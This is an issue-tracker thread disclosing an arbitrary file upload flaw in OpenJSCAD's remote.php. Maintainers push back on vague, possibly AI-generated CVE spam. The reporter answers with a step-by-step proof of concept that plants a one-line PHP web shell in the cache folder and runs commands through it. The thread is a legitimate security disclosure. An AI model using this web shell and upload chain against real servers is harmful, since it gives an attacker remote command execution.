Remote.php has a security issue with arbitrary file uploads

[Beatriz-ai-boop]

'packages/web/remote.php' Lack of proper validation and sanitization of the $_REQUEST['url'] parameter. Malicious users could inject malicious URLs, leading to remote code execution or other attacks.Using the basename function may also cause path traversal issues.

[hrgdavor]

@Beatriz-ai-boop you need to be more specific and show an example.
Taking into account recent uptick in spam CVE reports, and "AI crap" bots doing CVE search you need to provide proof CVE is real and not just assumed.

[z3dev]

Wow! Is @Beatriz-ai-boop trying to be helpful?

the good news is that the PHP remote is not being used.

[Beatriz-ai-boop]

Here are more details.

1. First download the project.
2. run mkdir cache on OpenJSCAD.org-master/packages/web/
3. request http://127.0.0.1:8099/OpenJSCAD.org-master/packages/web/remote.php?url=http://127.0.0.1:8099/shell.php

shell.php is:

<?php echo "<?php \$o=exec(\$_GET['c']);echo \$o;?>"?>

4. request http://127.0.0.1:8099/OpenJSCAD.org-master/packages/web/cache/240712060740-shell.php?c=whoami

Then you can execute any command based on this php file.

@hrgdavor @z3dev

[z3dev]

@Beatriz-ai-boop Go for it! Please make the fixes!